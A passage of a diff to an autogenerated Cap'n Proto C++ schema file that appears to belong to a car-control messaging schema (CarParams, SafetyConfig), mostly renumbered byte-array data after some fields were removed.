0, 1, 0, + 212, 1, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 237, 1, 0, 0, 114, 0, 0, 0, + 209, 1, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 1, 0, 0, 3, 0, 1, 0, - 248, 1, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 2, 0, 0, 0, + 208, 1, 0, 0, 3, 0, 1, 0, + 220, 1, 0, 0, 2, 0, 1, 0, + 12, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 1, 0, 0, 130, 0, 0, 0, + 217, 1, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 244, 1, 0, 0, 3, 0, 1, 0, - 0, 2, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 3, 0, 0, 0, + 216, 1, 0, 0, 3, 0, 1, 0, + 228, 1, 0, 0, 2, 0, 1, 0, + 13, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 253, 1, 0, 0, 202, 0, 0, 0, + 225, 1, 0, 0, 202, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 4, 2, 0, 0, 3, 0, 1, 0, - 16, 2, 0, 0, 2, 0, 1, 0, + 232, 1, 0, 0, 3, 0, 1, 0, + 244, 1, 0, 0, 2, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 13, 2, 0, 0, 114, 0, 0, 0, + 241, 1, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 12, 2, 0, 0, 3, 0, 1, 0, - 24, 2, 0, 0, 2, 0, 1, 0, + 240, 1, 0, 0, 3, 0, 1, 0, + 252, 1, 0, 0, 2, 0, 1, 0, 10, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 2, 0, 0, 90, 0, 0, 0, + 249, 1, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 20, 2, 0, 0, 3, 0, 1, 0, - 32, 2, 0, 0, 2, 0, 1, 0, + 248, 1, 0, 0, 3, 0, 1, 0, + 4, 2, 0, 0, 2, 0, 1, 0, 3, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 2, 0, 0, 82, 0, 0, 0, + 1, 2, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 2, 0, 0, 3, 0, 1, 0, + 12, 2, 0, 0, 2, 0, 1, 0, + 14, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 9, 2, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 12, 2, 0, 0, 3, 0, 1, 0, + 24, 2, 0, 0, 2, 0, 1, 0, + 15, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 8, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 21, 2, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 20, 2, 0, 0, 3, 0, 1, 0, + 32, 2, 0, 0, 2, 0, 1, 0, + 16, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 9, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 2, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 2, 0, 0, 3, 0, 1, 0, 40, 2, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 37, 2, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 40, 2, 0, 0, 3, 0, 1, 0, - 52, 2, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 8, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 49, 2, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 48, 2, 0, 0, 3, 0, 1, 0, - 60, 2, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 9, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 57, 2, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 56, 2, 0, 0, 3, 0, 1, 0, - 68, 2, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 65, 2, 0, 0, 130, 0, 0, 0, + 37, 2, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 64, 2, 0, 0, 3, 0, 1, 0, - 76, 2, 0, 0, 2, 0, 1, 0, + 36, 2, 0, 0, 3, 0, 1, 0, + 48, 2, 0, 0, 2, 0, 1, 0, 1, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 73, 2, 0, 0, 82, 0, 0, 0, + 45, 2, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 72, 2, 0, 0, 3, 0, 1, 0, - 84, 2, 0, 0, 2, 0, 1, 0, + 44, 2, 0, 0, 3, 0, 1, 0, + 56, 2, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 81, 2, 0, 0, 90, 0, 0, 0, + 53, 2, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 80, 2, 0, 0, 3, 0, 1, 0, - 92, 2, 0, 0, 2, 0, 1, 0, + 52, 2, 0, 0, 3, 0, 1, 0, + 64, 2, 0, 0, 2, 0, 1, 0, 7, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 89, 2, 0, 0, 122, 0, 0, 0, + 61, 2, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 88, 2, 0, 0, 3, 0, 1, 0, - 116, 2, 0, 0, 2, 0, 1, 0, + 60, 2, 0, 0, 3, 0, 1, 0, + 88, 2, 0, 0, 2, 0, 1, 0, 8, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 113, 2, 0, 0, 130, 0, 0, 0, + 85, 2, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 112, 2, 0, 0, 3, 0, 1, 0, - 140, 2, 0, 0, 2, 0, 1, 0, + 84, 2, 0, 0, 3, 0, 1, 0, + 112, 2, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 137, 2, 0, 0, 98, 0, 0, 0, + 109, 2, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 136, 2, 0, 0, 3, 0, 1, 0, - 148, 2, 0, 0, 2, 0, 1, 0, + 108, 2, 0, 0, 3, 0, 1, 0, + 120, 2, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 145, 2, 0, 0, 106, 0, 0, 0, + 117, 2, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 144, 2, 0, 0, 3, 0, 1, 0, - 156, 2, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 153, 2, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 152, 2, 0, 0, 3, 0, 1, 0, - 164, 2, 0, 0, 2, 0, 1, 0, + 116, 2, 0, 0, 3, 0, 1, 0, + 128, 2, 0, 0, 2, 0, 1, 0, 101, 110, 97, 98, 108, 101, 100, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -2943,15 +2791,6 @@ static const ::capnp::_::AlignedData<327> b_f78829049ab814af = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 116, 67, 111, 110, 116, 114, - 111, 108, 108, 101, 114, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -2962,11 +2801,11 @@ static const ::capnp::_::RawSchema* const d_f78829049ab814af[] = { &s_d895c87c4eb03a38, &s_e97275a919432828, }; -static const uint16_t m_f78829049ab814af[] = {7, 6, 10, 14, 2, 4, 0, 1, 5, 11, 17, 15, 12, 13, 9, 16, 8, 3}; -static const uint16_t i_f78829049ab814af[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17}; +static const uint16_t m_f78829049ab814af[] = {7, 6, 10, 14, 2, 4, 0, 1, 5, 11, 15, 12, 13, 9, 16, 8, 3}; +static const uint16_t i_f78829049ab814af[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}; const ::capnp::_::RawSchema s_f78829049ab814af = { - 0xf78829049ab814af, b_f78829049ab814af.words, 327, d_f78829049ab814af, m_f78829049ab814af, - 3, 18, i_f78829049ab814af, nullptr, nullptr, { &s_f78829049ab814af, nullptr, nullptr, 0, 0, nullptr } + 0xf78829049ab814af, b_f78829049ab814af.words, 311, d_f78829049ab814af, m_f78829049ab814af, + 3, 17, i_f78829049ab814af, nullptr, nullptr, { &s_f78829049ab814af, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<164> b_e97275a919432828 = { @@ -3651,55 +3490,51 @@ const ::capnp::_::RawSchema s_f5a5e26c954e339e = { }; #endif // !CAPNP_LITE CAPNP_DEFINE_ENUM(AudibleAlert_f5a5e26c954e339e, f5a5e26c954e339e); -static const ::capnp::_::AlignedData<1290> b_8c69372490aaa9da = { +static const ::capnp::_::AlignedData<1252> b_8c69372490aaa9da = { { 0, 0, 0, 0, 5, 0, 6, 0, 218, 169, 170, 144, 36, 55, 105, 140, 10, 0, 0, 0, 1, 0, 17, 0, 141, 139, 175, 8, 231, 241, 42, 142, - 15, 0, 7, 0, 0, 0, 0, 0, + 14, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 162, 0, 0, 0, - 29, 0, 0, 0, 247, 0, 0, 0, + 29, 0, 0, 0, 231, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 1, 0, 0, 143, 15, 0, 0, + 17, 1, 0, 0, 31, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 97, 114, 46, 99, 97, 112, 110, 112, 58, 67, 97, 114, 80, 97, 114, 97, 109, 115, 0, 0, 0, 0, 0, - 60, 0, 0, 0, 1, 0, 1, 0, - 87, 219, 214, 99, 173, 58, 46, 247, - 113, 0, 0, 0, 74, 0, 0, 0, + 56, 0, 0, 0, 1, 0, 1, 0, 201, 176, 86, 96, 156, 52, 54, 232, - 113, 0, 0, 0, 106, 0, 0, 0, + 105, 0, 0, 0, 106, 0, 0, 0, 163, 221, 137, 28, 59, 178, 129, 181, - 113, 0, 0, 0, 114, 0, 0, 0, + 105, 0, 0, 0, 114, 0, 0, 0, 46, 76, 209, 203, 63, 114, 34, 150, - 113, 0, 0, 0, 138, 0, 0, 0, + 105, 0, 0, 0, 138, 0, 0, 0, 29, 204, 78, 128, 14, 110, 54, 128, - 117, 0, 0, 0, 162, 0, 0, 0, + 109, 0, 0, 0, 162, 0, 0, 0, 142, 155, 62, 48, 252, 206, 66, 195, - 121, 0, 0, 0, 178, 0, 0, 0, + 113, 0, 0, 0, 178, 0, 0, 0, 179, 51, 85, 4, 46, 71, 52, 163, - 125, 0, 0, 0, 146, 0, 0, 0, + 117, 0, 0, 0, 146, 0, 0, 0, 18, 106, 97, 40, 63, 30, 21, 157, - 129, 0, 0, 0, 138, 0, 0, 0, + 121, 0, 0, 0, 138, 0, 0, 0, 81, 244, 218, 30, 91, 30, 85, 149, - 133, 0, 0, 0, 98, 0, 0, 0, + 125, 0, 0, 0, 98, 0, 0, 0, 127, 247, 222, 226, 43, 81, 97, 214, - 133, 0, 0, 0, 138, 0, 0, 0, + 125, 0, 0, 0, 138, 0, 0, 0, 236, 192, 191, 20, 235, 46, 22, 143, - 137, 0, 0, 0, 138, 0, 0, 0, + 129, 0, 0, 0, 138, 0, 0, 0, 206, 89, 147, 12, 24, 86, 43, 150, - 141, 0, 0, 0, 50, 0, 0, 0, + 133, 0, 0, 0, 50, 0, 0, 0, 145, 214, 209, 89, 183, 155, 17, 247, - 137, 0, 0, 0, 34, 0, 0, 0, + 129, 0, 0, 0, 34, 0, 0, 0, 206, 64, 220, 216, 35, 85, 217, 159, - 133, 0, 0, 0, 146, 0, 0, 0, + 125, 0, 0, 0, 146, 0, 0, 0, 81, 60, 131, 42, 104, 227, 153, 255, - 137, 0, 0, 0, 130, 0, 0, 0, - 76, 97, 116, 84, 117, 110, 101, 115, - 0, 0, 0, 0, 0, 0, 0, 0, + 129, 0, 0, 0, 130, 0, 0, 0, 83, 97, 102, 101, 116, 121, 67, 111, 110, 102, 105, 103, 0, 0, 0, 0, 76, 97, 116, 101, 114, 97, 108, 80, @@ -3734,504 +3569,490 @@ static const ::capnp::_::AlignedData<1290> b_8c69372490aaa9da = { 101, 0, 0, 0, 0, 0, 0, 0, 78, 101, 116, 119, 111, 114, 107, 76, 111, 99, 97, 116, 105, 111, 110, 0, - 28, 1, 0, 0, 3, 0, 4, 0, + 20, 1, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 181, 7, 0, 0, 66, 0, 0, 0, + 125, 7, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 176, 7, 0, 0, 3, 0, 1, 0, - 188, 7, 0, 0, 2, 0, 1, 0, + 120, 7, 0, 0, 3, 0, 1, 0, + 132, 7, 0, 0, 2, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 185, 7, 0, 0, 122, 0, 0, 0, + 129, 7, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 184, 7, 0, 0, 3, 0, 1, 0, - 196, 7, 0, 0, 2, 0, 1, 0, + 128, 7, 0, 0, 3, 0, 1, 0, + 140, 7, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 193, 7, 0, 0, 170, 0, 0, 0, + 137, 7, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 196, 7, 0, 0, 3, 0, 1, 0, - 208, 7, 0, 0, 2, 0, 1, 0, + 140, 7, 0, 0, 3, 0, 1, 0, + 152, 7, 0, 0, 2, 0, 1, 0, 5, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 7, 0, 0, 82, 0, 0, 0, + 149, 7, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 7, 0, 0, 3, 0, 1, 0, - 216, 7, 0, 0, 2, 0, 1, 0, - 52, 0, 0, 0, 2, 0, 0, 0, + 148, 7, 0, 0, 3, 0, 1, 0, + 160, 7, 0, 0, 2, 0, 1, 0, + 50, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 7, 0, 0, 186, 0, 0, 0, + 157, 7, 0, 0, 186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 216, 7, 0, 0, 3, 0, 1, 0, - 228, 7, 0, 0, 2, 0, 1, 0, + 160, 7, 0, 0, 3, 0, 1, 0, + 172, 7, 0, 0, 2, 0, 1, 0, 6, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 7, 0, 0, 82, 0, 0, 0, + 169, 7, 0, 0, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 7, 0, 0, 3, 0, 1, 0, - 236, 7, 0, 0, 2, 0, 1, 0, - 53, 0, 0, 0, 4, 0, 0, 0, + 168, 7, 0, 0, 3, 0, 1, 0, + 180, 7, 0, 0, 2, 0, 1, 0, + 51, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 7, 0, 0, 170, 0, 0, 0, + 177, 7, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 7, 0, 0, 3, 0, 1, 0, - 248, 7, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 1, 0, 0, 0, + 180, 7, 0, 0, 3, 0, 1, 0, + 192, 7, 0, 0, 2, 0, 1, 0, + 10, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 245, 7, 0, 0, 122, 0, 0, 0, + 189, 7, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 244, 7, 0, 0, 3, 0, 1, 0, - 0, 8, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 2, 0, 0, 0, + 188, 7, 0, 0, 3, 0, 1, 0, + 200, 7, 0, 0, 2, 0, 1, 0, + 11, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 253, 7, 0, 0, 114, 0, 0, 0, + 197, 7, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 252, 7, 0, 0, 3, 0, 1, 0, - 8, 8, 0, 0, 2, 0, 1, 0, - 58, 0, 0, 0, 1, 0, 0, 0, + 196, 7, 0, 0, 3, 0, 1, 0, + 208, 7, 0, 0, 2, 0, 1, 0, + 56, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 5, 8, 0, 0, 178, 0, 0, 0, + 205, 7, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 8, 8, 0, 0, 3, 0, 1, 0, - 20, 8, 0, 0, 2, 0, 1, 0, - 57, 0, 0, 0, 6, 0, 0, 0, + 208, 7, 0, 0, 3, 0, 1, 0, + 220, 7, 0, 0, 2, 0, 1, 0, + 55, 0, 0, 0, 6, 0, 0, 0, 0, 0, 1, 0, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 17, 8, 0, 0, 178, 0, 0, 0, + 217, 7, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 20, 8, 0, 0, 3, 0, 1, 0, - 32, 8, 0, 0, 2, 0, 1, 0, - 63, 0, 0, 0, 2, 0, 0, 0, + 220, 7, 0, 0, 3, 0, 1, 0, + 232, 7, 0, 0, 2, 0, 1, 0, + 61, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 8, 0, 0, 170, 0, 0, 0, + 229, 7, 0, 0, 170, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 232, 7, 0, 0, 3, 0, 1, 0, + 4, 8, 0, 0, 2, 0, 1, 0, + 62, 0, 0, 0, 3, 0, 0, 0, + 0, 0, 1, 0, 12, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 8, 0, 0, 162, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 4, 8, 0, 0, 3, 0, 1, 0, + 32, 8, 0, 0, 2, 0, 1, 0, + 63, 0, 0, 0, 4, 0, 0, 0, + 0, 0, 1, 0, 13, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 29, 8, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 8, 0, 0, 3, 0, 1, 0, 60, 8, 0, 0, 2, 0, 1, 0, - 64, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 12, 0, 0, 0, + 64, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 57, 8, 0, 0, 162, 0, 0, 0, + 57, 8, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 60, 8, 0, 0, 3, 0, 1, 0, 88, 8, 0, 0, 2, 0, 1, 0, - 65, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 13, 0, 0, 0, + 65, 0, 0, 0, 6, 0, 0, 0, + 0, 0, 1, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 85, 8, 0, 0, 154, 0, 0, 0, + 85, 8, 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 88, 8, 0, 0, 3, 0, 1, 0, 116, 8, 0, 0, 2, 0, 1, 0, - 66, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 14, 0, 0, 0, + 66, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 1, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 113, 8, 0, 0, 146, 0, 0, 0, + 113, 8, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, 8, 0, 0, 3, 0, 1, 0, 144, 8, 0, 0, 2, 0, 1, 0, - 67, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 15, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 141, 8, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 144, 8, 0, 0, 3, 0, 1, 0, - 172, 8, 0, 0, 2, 0, 1, 0, - 68, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 169, 8, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 172, 8, 0, 0, 3, 0, 1, 0, - 200, 8, 0, 0, 2, 0, 1, 0, - 18, 0, 0, 0, 4, 0, 0, 0, + 16, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 8, 0, 0, 42, 0, 0, 0, + 141, 8, 0, 0, 42, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 136, 8, 0, 0, 3, 0, 1, 0, + 148, 8, 0, 0, 2, 0, 1, 0, + 17, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 18, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 145, 8, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 144, 8, 0, 0, 3, 0, 1, 0, + 156, 8, 0, 0, 2, 0, 1, 0, + 18, 0, 0, 0, 6, 0, 0, 0, + 0, 0, 1, 0, 19, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 153, 8, 0, 0, 114, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 152, 8, 0, 0, 3, 0, 1, 0, + 164, 8, 0, 0, 2, 0, 1, 0, + 19, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 1, 0, 20, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 161, 8, 0, 0, 90, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 160, 8, 0, 0, 3, 0, 1, 0, + 172, 8, 0, 0, 2, 0, 1, 0, + 20, 0, 0, 0, 8, 0, 0, 0, + 0, 0, 1, 0, 21, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 169, 8, 0, 0, 122, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 168, 8, 0, 0, 3, 0, 1, 0, + 180, 8, 0, 0, 2, 0, 1, 0, + 21, 0, 0, 0, 9, 0, 0, 0, + 0, 0, 1, 0, 22, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 177, 8, 0, 0, 146, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 180, 8, 0, 0, 3, 0, 1, 0, + 192, 8, 0, 0, 2, 0, 1, 0, + 22, 0, 0, 0, 10, 0, 0, 0, + 0, 0, 1, 0, 23, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 189, 8, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 192, 8, 0, 0, 3, 0, 1, 0, 204, 8, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 18, 0, 0, 0, + 23, 0, 0, 0, 11, 0, 0, 0, + 0, 0, 1, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 201, 8, 0, 0, 82, 0, 0, 0, + 201, 8, 0, 0, 146, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 200, 8, 0, 0, 3, 0, 1, 0, - 212, 8, 0, 0, 2, 0, 1, 0, - 20, 0, 0, 0, 6, 0, 0, 0, - 0, 0, 1, 0, 19, 0, 0, 0, + 204, 8, 0, 0, 3, 0, 1, 0, + 216, 8, 0, 0, 2, 0, 1, 0, + 24, 0, 0, 0, 8, 0, 0, 0, + 0, 0, 1, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 209, 8, 0, 0, 114, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 208, 8, 0, 0, 3, 0, 1, 0, - 220, 8, 0, 0, 2, 0, 1, 0, - 21, 0, 0, 0, 7, 0, 0, 0, - 0, 0, 1, 0, 20, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 217, 8, 0, 0, 90, 0, 0, 0, + 213, 8, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 216, 8, 0, 0, 3, 0, 1, 0, 228, 8, 0, 0, 2, 0, 1, 0, - 22, 0, 0, 0, 8, 0, 0, 0, - 0, 0, 1, 0, 21, 0, 0, 0, + 26, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 104, 149, 51, 53, 10, 88, 252, 147, + 225, 8, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 8, 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 8, 0, 0, 3, 0, 1, 0, - 236, 8, 0, 0, 2, 0, 1, 0, - 23, 0, 0, 0, 9, 0, 0, 0, - 0, 0, 1, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 8, 0, 0, 146, 0, 0, 0, + 27, 0, 0, 0, 5, 0, 0, 0, + 0, 0, 1, 0, 28, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 205, 8, 0, 0, 130, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 204, 8, 0, 0, 3, 0, 1, 0, + 216, 8, 0, 0, 2, 0, 1, 0, + 29, 0, 0, 0, 12, 0, 0, 0, + 0, 0, 1, 0, 29, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 213, 8, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 212, 8, 0, 0, 3, 0, 1, 0, + 224, 8, 0, 0, 2, 0, 1, 0, + 67, 0, 0, 0, 6, 0, 0, 0, + 0, 0, 1, 0, 30, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 221, 8, 0, 0, 234, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 